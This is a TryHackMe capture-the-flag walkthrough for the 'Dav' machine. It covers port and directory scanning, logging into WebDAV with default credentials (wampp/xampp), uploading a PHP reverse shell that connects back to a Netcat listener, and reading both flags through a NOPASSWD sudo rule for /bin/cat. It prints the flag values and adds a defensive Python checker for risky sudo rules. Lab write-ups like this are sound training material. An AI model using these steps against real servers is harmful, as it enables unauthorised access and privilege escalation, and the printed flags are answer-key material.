It’s Shahabor Hossain Rifat here. Today I’m going to show you how you can break into the Dav TryHackMe machine. So let’s get started.
First I simply scanned for all the ports using Nmap.
Port 80 is open, so let’s access the website. There is an Apache default page.
Let’s run gobuster against the website and see what we can find out.
I found a WebDAV accessible directory.
We need a username and password to access this directory. I did some Google searches and found a blog article.
I found that we can use ‘cadaver’ to access WebDAV. Let’s try to log in with the default credentials.
user: wampp pass: xampp
We can now upload a PHP shell. I got a PHP reverse shell from pentestmonkey’s GitHub.
Don’t forget to modify your IP and PORT in the PHP shell.
Do not forget to open a Netcat listener.
dav:/webdav/> PUT shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 193425 bytes succeeded.
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav                            44  August 26  2019
shell.php                         193425  October 12 12:10
❯ nc -nvlp 9999
Connection from 10.10.155.247:49024
Linux ubuntu 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 23:17:49 up 18 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/merlin/user.txt
449b40fe93f78a938523b7e4dcd66d2a
After a bit of enumeration, I ran the sudo -l command. We see that we can leverage cat to read the root flag because we can run it as root.
$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
It’s too easy.
$ sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
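The sudoers rule that makes this step work is exactly what a hardening review should catch. The script below is an added example, not part of the original walkthrough: it parses `sudo -l` output (the output shown above is embedded inline) and flags NOPASSWD rules that grant ALL or a file-reading binary as root; the list of flagged binaries is a constructed assumption, not an exhaustive catalogue.

```python
import re

# The `sudo -l` output from the walkthrough, embedded so the script runs offline.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat
"""

# Constructed (assumed) list: binaries that disclose any file when run as root.
FILE_READERS = {"cat", "less", "more", "head", "tail", "tac"}

# One command-spec line looks like: "(runas) TAG: TAG: cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Parse `sudo -l` output into a list of {runas, nopasswd, commands} dicts."""
    entries = []
    in_commands = False
    for line in output.splitlines():
        # Everything before the "User ... may run" header is Defaults; skip it.
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        commands = [c.strip() for c in m.group("cmds").split(",")]
        entries.append({"runas": m.group("runas").strip(),
                        "nopasswd": "NOPASSWD" in tags, "commands": commands})
    return entries


def find_risky(entries):
    """Return (runas, command, nopasswd) for rules granting ALL or a file reader."""
    findings = []
    for entry in entries:
        for cmd in entry["commands"]:
            basename = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or basename in FILE_READERS:
                findings.append((entry["runas"], cmd, entry["nopasswd"]))
    return findings


if __name__ == "__main__":
    for runas, cmd, nopasswd in find_risky(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"risky sudo rule: ({runas}) {'NOPASSWD: ' if nopasswd else ''}{cmd}")
```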
Hope you guys enjoyed this TryHackMe walkthrough.